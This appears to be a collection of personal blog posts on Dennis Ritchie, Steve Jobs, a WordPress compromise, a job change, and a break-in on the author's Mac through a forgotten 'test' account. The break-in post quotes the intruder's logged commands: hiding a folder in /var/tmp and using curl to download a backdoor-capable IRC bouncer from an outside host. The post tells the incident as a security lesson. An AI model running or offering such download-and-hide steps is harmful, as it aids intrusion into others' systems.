Dennis Ritchie, designer of the C programming language, and co-inventor of UNIX — arguably two of the most influential computer science creations ever — passed away at 70. As my formative years in computing were highlighted by UNIX and C, I felt a bit of nostalgia as well as gratitude for “dmr”s contributions. I still think of the original K&R as the best programming book ever – when a colleague told me he was going to write a book on C, I couldn’t understand why – since K&R existed, nothing else need be said! In fact its conciseness greatly influenced my own writing style – some might say to a fault. Years later, I used the first edition K&R as guidance for the original DMTF DMI 1.0 spec (sadly, no longer available), which was somewhat ironic that I’d use it for a standards committee document:
When I read commentary about suggestions for where C should go, I often think back and give thanks that it wasn’t developed under the advice of a worldwide crowd.
— Dennis Ritchie
Tonight I spent quite a bit of time reading sections of his Bell Lab’s home page — technical materials and observations that I hope stays up for posterity. These are important artifacts that brought us to where we are now.
From an operating system research point of view, Unix is — if not dead — certainly old stuff, and it’s clear that people should be looking beyond it.
— Dennis Ritchie, 1990 Summer Usenix keynote speech
UNIX, if you don’t know, is the basis for the software that runs Mac OS X, Linux, Android, iPhones & iPads, and lots of other stuff. Not too shabby.
I don’t have any personal stories to tell about meeting Steve Jobs.
I’m not a “long-time” Apple user. But I am acutely aware of the date I would become one: January 7, 2003. Steve Jobs introduced the 12″ Aluminum PowerBook G4 at MacWorld. I’m not sure how I knew about the keynote – perhaps because I had an iPod and thought it was great – but that afternoon I found myself watching the QuickTime replay from Apple’s web site, hunched over some Windows laptop. I’d never seen a SteveNote before, and was hooked by everything about it, and I said “I am switching to the Mac.” Keep in mind I hadn’t even used one at the time, but I still knew it.
Long story short, while diving into Apple’s worldview can be daunting, it’s been incredibly rewarding. I’ve learned a lot about how difficult it is to make something appear simple. I started thinking about software in words like elegance, and started using the word design to mean more than architecture.
The iPod and the PowerBook have long since been retired, obsoleted by newer models. But I still have them, because they were my first.
So I thought – at least one blog post a month won’t be difficult, right?
Then in February, right before I was scheduled to speak at eTail West, I get an ominous email from Google saying my blog is spewing malware. I immediately checked and was convinced the email was legit. Oh crap. Later Google would complain about many more sites I host, here’s an example email:
I host a number of sites (including some blogs, a mail server, a personal photo gallery, two commercial sites and a non-profit group) and all of them were compromised. So I disabled all the web sites until I returned from eTail. When I got back home, I cleaned and rebuilt each site one-by-one. During the rebuilds, sites were getting re-infected, and it was difficult to find the attack vector. The web wasn’t any help, except that I got a good appreciation for some of the old security issues in WordPress and its plugins – none of which I was experiencing.
It turns out that while bobpage.net was up-to-date with its software, another locally-hosted site was not, and got compromised. The attack granted access to the local file system, so every web site I hosted got infected. Nice. Once I installed some hand-rolled logging software I saw how quickly a site would get hit, and then infect everything else.
Finally I learned enough to understand this particular attack, and I installed various intrusion detection, firewall and logging packages, just in case, and turned on sites one-by-one until I was satisfied I had everything back under control. The whole thing probably took me two weeks to fix, since I couldn’t just drop everything else I was doing. But it did consume most of an entire weekend.
As to what the malware did, I never really looked. As long as it was gone I was satisfied.
Back in the day I ran all my own machines & software, built around FreeBSD and Linux. One day I decided there were better things to do than to continually monitor every mail list and patch my system software. So I switched my machines to Mac and went to outsourced hosting. That doesn’t solve everything but it did lower the administrative burden, because I was putting my faith in others who claimed they were up to the task. But I couldn’t fully give up everything, so I went with a self-administered version of WordPress instead of using the hosting and software available at wordpress.com. As a result, a slip-up in my software patching caused me days of hassle.
That was late February – early March. For now, I’m still using my own hosted version of WordPress, because I keep telling myself it gives me lots of flexibility should I want/ need it. Today I installed the latest patches, checked my logs, and decided it was safe to blog again (for some definition of ‘safe’). I’m not a big fan of blogging about blogging, but the larger story is that no matter how remote and isolated you think you are, you’re running buggy software at the end of some IP address. The scanners will find you, and the scammers will take advantage if they are able. Whether or not you care depends on how much control/flexibility you want. But I guess with great flexibility comes great responsibility, or something like that.
So, the Strata conference was good, and my talk was pretty well received. Work got in the way of me hanging out at the conference for the whole three days, but I did spend about a day and some change meeting lots of smart people (including a lot of ex-Yahooers) and taking in some talks. It’s a very different vibe from eMetrics – that’s not a judgment, just an observation. Much more technical and “hands-on” in nature – a lot of it reminded me of eMetrics 2006, with a focus on tools and technologies. If you missed it, or want to relive it, you can find Strata 2011 Speaker Slides & Videos.
One personal highlight was chatting with Duncan Davidson, who is doing a lot of photography for O’Reilly events (and many others .. check out his site). The kick was that he and I were in a Palo Alto community photography class with about a dozen other people back in … oh, 2002ish maybe? And now look at him: a pro photographer, living the dream…
Tonight I did something both humbling and inspiring at the same time. I read my own blog. Like, all of it. There’s not a lot to read, really, until you reach back to 2005. There’s now lots of missing images and busted links. Such is the web, I guess. But the experience was inspiring because I found myself on several occasions thinking “wow! that was well said! Did I really say that?” and then followed by “Hmm, I don’t think I’m that smart any more.” Perhaps blogging is like exercising – if you don’t use the muscle, it atrophies?
Speaking of busted links. Back when the web was black and white with blue links, I had some content on my old neato.org site, wherein I poked at a few sound and video devices to reveal their secrets. Various nooks and crannies of the web still have pointers to that material, and still get the occasional email asking if I have the content around somewhere and can I please put it back up? So over the weekend, I did.
Thanks for the emails and tweets around my time off, it was short but sweet. While it would have been great to take more time to decompress, I knew what was ahead — and felt like a kid on Christmas Eve. I didn’t want to wait, because …
I’ve joined eBay.
eBay has many fabulous analytical tools already, both commercial and home-grown, for lots of different kinds of analysis. In addition, they are on a road to build out a whole new class of analytic capabilities based on Hadoop. They recently reorganized the data initiatives and groups to form a team that re-focuses the “many standalone tools” mindset to a “platform” for analytics. This holistic vision, and the “central data, distributed analysis” mindset aligns so well with my thinking and interests that I had to make the jump. As much as I love what Yahoo! is doing with analytics, the opportunity at eBay was too compelling to pass up. I mean, come on .. it’s the world’s largest online marketplace!
My discussions with the eBay leadership team told me two important things. First, they are ready to make significant investments in data capabilities to drive the next generation of eBay. Second, the new leadership over the last couple of years is bringing a change to the business, where the company will be much more technology- and innovation-driven than it has been in the past. Many of the leadership hires in the last 18 months are a testament to that. And I like to think I am another proof point.
Having cool technology and a leadership team that understands the value of data is a great start. But the icing on the cake is the level of data and analytics talent within eBay. It is, in a word, staggering. I am truly humbled by the opportunity to work with a group of this caliber.
When I started my keynote presentation at eMetrics Santa Barbara 2006, I said “there was a time when I was not at Yahoo!, and there will be a time when I’m no longer at Yahoo!.” That day has come .. it’s my last day at Yahoo!.
Lest anyone think this means I’m down on the company — it’s quite the opposite! I’m more positive than ever about Yahoo!, especially the analytics. I am very excited about where the company is going with data. After a short but ill-advised set of changes that de-emphasized a coordinated approach to data and analytics, a new leadership team (read: Carol Bartz) recently reconstituted a central data and analytics group. You may even have heard or read Carol saying we’re looking for acquisition candidates in the analytics space. I’m very glad to see the return of executive leadership that sees the strategic value of data.
I’ve never been one to talk a lot about Yahoo! and I won’t start now, especially the internal goings-on, but there’s new leadership, a new commitment, a new focus, and frankly I’m really glad to see it happening. I am also jazzed about the 2010 and 2011 roadmap for our products, including Yahoo! Web Analytics, our advertising analytics products, and for a lot of internal products you haven’t heard of. Oh, and as I tweeted previously, the YWA team is hiring…
And with that, a chapter closes. Yahoo! has been good to me, and I like to think I’ve been good to Yahoo!. But even the good things don’t always last forever, and after almost five and half years, it’s time for me to say goodbye. I’m going to take a short break, decompress a little, and then gear up for the next thing. But that’s a story for another time.
I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.
Oh, and of course, I set it up with full administrator privileges.
Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?
The reason: because somebody else had, three days ago. And changed it.
I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:
3. uname -a
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
See who’s on.
Change the password for user “test”.
See what kind of system this is.
Go to a folder commonly used for temporary files.
Create a folder named ” ” (just a single space).
Change to that folder.
Download a file from the web.
Try the download again.
Give up, and log out.
So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:
curl: (7) Failed to connect to 126.96.36.199: Host is down
So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.
Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:
Do what you can to prevent break-ins.
Log everything so you can figure out how the inevitable break-in happened.
Convenience is often at the expense of security
I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.
I humbly admit all of this in the hope that you can learn from my near miss.
Well, it’s hockey playoff season, so that means it’s time to resurface the blog.
OK, that doesn’t make any sense, but I wanted to say something about hockey, so there you go.
Yes, I really am resurfacing the blog– upgraded the software and put in a fresh coat of paint. I intend to consolidate a few old blogs and assorted posts from the past; there’s a pile of stuff from Ye Olden Days that will eventually make its way here.
While I’m not a fan of revisionist blogging, I’ve cleaned up some of the old posts (broken links) and deleted a few posts that made no sense – e.g. they were too time-based to be of even token value now.
The New and Improved site is being watched by Google, because I’m sending web bugs beacons back to Google Analytics. I’m also publishing the feed through Feedburner, which provides its own set of (rather weak) stats.
For you RSS readers, no big changes, except that the whole feed got refreshed with the software changes. Oops.
So what’s the story? Simple. I got crazy busy, and blogging fell below the line. Not just writing — reading did too. Months ago, a colleague mentioned that he’s more interesting when he reads blogs. I’ve started reading again, but if there’s a correlation between amount of reading and interestingness, I’m still not very interesting. But since being interesting has never stopped me from blogging, I say Game On!